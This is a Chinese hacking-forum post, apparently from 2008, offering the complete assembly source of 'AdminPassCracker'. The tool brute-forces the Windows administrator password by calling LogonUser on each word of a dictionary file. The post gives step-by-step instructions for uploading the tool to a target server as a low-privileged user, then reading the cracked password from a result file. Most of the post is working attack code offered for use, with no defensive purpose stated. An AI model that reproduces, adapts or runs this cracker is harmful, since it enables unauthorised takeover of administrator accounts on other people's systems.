软件作者:taiwansee信息来源:邪恶八进制信息安全团队(www.eviloctal.com)这个idea源自以前学runas命令时候的启发。 使用方法: 1、把你的密码字典改名成psw.txt后, 上传到目标服务器的一个可执行、可写的目录中。 这里假设这个目录是:c:\windows\temp\ 2、把程序上传到c:\windows\temp\中, 然后运行它。 3、然后就是等待, 过几分钟(具体时间看你的字典大小了)查阅c:\windows\temp\下的result_.txt中的结果, 如果为空就说明还没破解完, 另选时间再回来看。 特点: 不需要抓hash, 不需要管理员权限, ISUR_*用户就能用, 速度慢(这个也是特点哦)在测试机中的表现是每秒尝试1800个密码左右。 默认破解administrator用户的密码。 要破其它, 请自行修改代码。 result_.txt示例:-----------------------------The administrators password is: testerThe program had tried 32653 times! :)Use time:0 hour(s) 0 minute(s) 17.109 second(s),average speed: 1908 times/s.-----------------------------源代码如下:AdminPassCrack.asm文件 Quote:;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; AdminPassCracker;; By taiwansee 2008.10.23;; 使用 nmake 或下列命令进行编译和链接:; ml /c /coff AdminPassCracker.asm; Link /subsystem:windows AdminPassCracker.obj;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .386 .model flat, stdcall option casemap :none;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; Include 文件定义;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>include windows.incinclude user32.incincludelib user32.libinclude kernel32.incincludelib kernel32.libinclude Advapi32.incincludelib Advapi32.libinclude _TotalTime.asm;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; 数据段;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .constDEBUG equ 0LOGON32_LOGON_NETWORK equ 3LOGON32_PROVIDER_DEFAULT equ 0;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; 数据段;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>align 4 .data?hModuleHandle DWORD ?szFileName BYTE MAX_PATH dup(?) .dataszResultFile BYTE result_.txt,0szPswDic BYTE psw.txt,0szDomain BYTE .,0szUserName BYTE administrator,0szResultFileFormat BYTE The administrator,27h,s password is: %s,0dh,0ah BYTE The program had tried %d times! :),0dh,0ah,0szNoDicFileErr BYTE Sorry,dic file not exists.,0szCreateFileMappingErr BYTE CreateFileMapping Error!,0szMapViewOfFileErr BYTE MapViewOfFile Error!,0szNotFound BYTE Password not found! :(,0dh,0ah,0;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; 代码段;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .codealign 4_WinMain proc local @hPswDic:DWORD,\ @szPswTmp[MAX_PATH]:BYTE,\ @dwPswDicFileSize:DWORD,\ @hResultFile:DWORD,\ @dwWritten:DWORD,\ @hPswDicFileMap:DWORD,\ @hToken:DWORD,\ @dwTriedTimes:DWORD,\ @szBuf[MAX_PATH]:BYTE,\ @dwContentLength:DWORD,\ @lpPswDic:DWORD,\ @lpNext:DWORD,\ @lpStart:DWORD,\ @dwStart:DWORD ;Create file to record results. invoke CreateFile,offset szResultFile,GENERIC_READ or GENERIC_WRITE,\ FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,\ FILE_ATTRIBUTE_NORMAL,NULL .if eax == INVALID_HANDLE_VALUE jmp _Error_Exit .endif mov @hResultFile,eax;Open Dictionary file. invoke CreateFile,offset szPswDic,GENERIC_READ,\ FILE_SHARE_READ,NULL,OPEN_EXISTING,\ FILE_ATTRIBUTE_NORMAL,NULL .if eax == INVALID_HANDLE_VALUE invoke WriteFile,@hResultFile,offset szNoDicFileErr,sizeof szNoDicFileErr,addr @dwWritten,NULL jmp _Error_Exit .endif mov @hPswDic,eax invoke GetFileSize,@hPswDic,NULL mov @dwPswDicFileSize,eax;**********CreateFileMapping********** invoke CreateFileMapping,@hPswDic,NULL,PAGE_READONLY,0,0,NULL .if eax==NULL invoke WriteFile,@hResultFile,offset szCreateFileMappingErr,\ sizeof szCreateFileMappingErr,addr @dwWritten,NULL jmp _Error_Exit .endif mov @hPswDicFileMap,eax;**********MapViewOfFile********** invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0 .if eax==NULL invoke WriteFile,@hResultFile,offset szMapViewOfFileErr,\ sizeof szMapViewOfFileErr,addr @dwWritten,NULL jmp _Error_Exit .endif mov @lpPswDic,eax mov @lpNext,eax mov @lpStart,eax invoke GetTickCount ;计算使用的毫秒数,开始 mov @dwStart,eax xor ecx,ecx ;统计已经分析的字符个数 xor eax,eax mov @dwTriedTimes,eax ;统计尝试的次数 .while TRUE cld mov esi,@lpStart lea edi,@szPswTmp @@: lodsb .if al!=0dh stosb inc ecx .if ecx==@dwPswDicFileSize jmp @F .elseif ecx>@dwPswDicFileSize jmp _NotFound .endif jmp @B .endif @@: add ecx,2 xor eax,eax stosw ;用0结尾 lea eax,[esi+1] mov @lpNext,eax ;修正到下一个密码 push ecx ;保存计数值 invoke LogonUser,offset szUserName,offset szDomain,addr @szPswTmp,\ LOGON32_LOGON_NETWORK,\ LOGON32_PROVIDER_DEFAULT,\ addr @hToken .if eax==NULL pop ecx ;恢复计数值 push @lpNext pop @lpStart inc @dwTriedTimes .continue .else pop ecx ;堆栈平衡 .break .endif .endw invoke GetTickCount ;计算使用的毫秒数,结束 sub eax,@dwStart mov @dwStart,eax invoke wsprintf,addr @szBuf,offset szResultFileFormat,addr @szPswTmp,@dwTriedTimes invoke lstrlen,addr @szBuf mov @dwContentLength,eax invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL invoke _TotalTime,addr @szBuf,@dwStart,@dwTriedTimes,NULL invoke lstrlen,addr @szBuf mov @dwContentLength,eax invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL xor eax,eax inc eax ret_NotFound: invoke GetTickCount ;计算使用的毫秒数,开始 sub eax,@dwStart mov @dwStart,eax invoke lstrcpy,addr @szBuf,offset szNotFound invoke _TotalTime,addr @szPswTmp,@dwStart,@dwTriedTimes,NULL invoke lstrcat,addr @szBuf,addr @szPswTmp invoke lstrlen,addr @szBuf mov @dwContentLength,eax invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL_Error_Exit: xor eax,eax ret_WinMain endp;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>start: invoke GetModuleHandle,NULL mov hModuleHandle,eax invoke GetModuleFileName,hModuleHandle,offset szFileName,sizeof szFileName invoke lstrlen,offset szFileName cld mov esi,offset szFileName add esi,eax std@@: lodsb cmp al,5ch jne @B mov byte ptr [esi+2],0 cld invoke SetCurrentDirectory,offset szFileName call _WinMain invoke ExitProcess,NULL;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> end start_TotalTime.asm文件Quote: .dataszResultFormat BYTE Use time:%d hour(s) %d minute(s) %d.%03d second(s),average speed: %d times/s.,0dh,0ah,0 .code;********************************************************; _TotalTime;_lpBuf为调用者提供的接收结果缓冲区;_dwTotalTime为总耗时, 一般来说, 前面有;invoke GetTickCount;sub eax,@dwStart;这两条指令;_dwThingsHappend为在计时期间, 关心的事件发生的次数;_FutrueExtention为将来拓展用;********************************************************_TotalTime proc _lpBuf,_dwTotalTime,_dwThingsHappend,_FutrueExtentionlocal @dwStart:DWORD,\ @dwMilliseconds:DWORD,\ @dwSecond:DWORD,\ @dwMinute:DWORD,\ @dwHour:DWORD,\ @dwSus:DWORD,\ @AVGSpeed:DWORD mov eax,_dwTotalTime ;时间换算 xor edx,edx mov ebx,1000 div ebx mov @dwMilliseconds,edx ;毫秒 xor edx,edx mov ebx,60 div ebx mov @dwSecond,edx xor edx,edx mov ebx,60 div ebx mov @dwMinute,edx xor edx,edx mov ebx,24 div ebx mov @dwHour,edx ;计算平均速度:_dwThingsHappend÷_dwTotalTime xor edx,edx mov eax,_dwThingsHappend ;_dwThingsHappend 也扩大1000倍(因为_dwTotalTime时间是毫秒数) mov ebx,1000 mul ebx mov ebx,_dwTotalTime ;把_dwTotalTime的值恢复到ebx .if ebx!=0 div ebx mov @AVGSpeed,eax .else ;如果_dwTotalTime为0,说明运行时间太少,无法统计,在这里用_dwThingsHappend作为@AVGSpeed的 push _dwThingsHappend pop @AVGSpeed .endif invoke wsprintf,_lpBuf,\ offset szResultFormat,\ @dwHour,\ @dwMinute,\ @dwSecond,\ @dwMilliseconds,\ @AVGSpeed xor eax,eax inc eax ret_TotalTime endp
……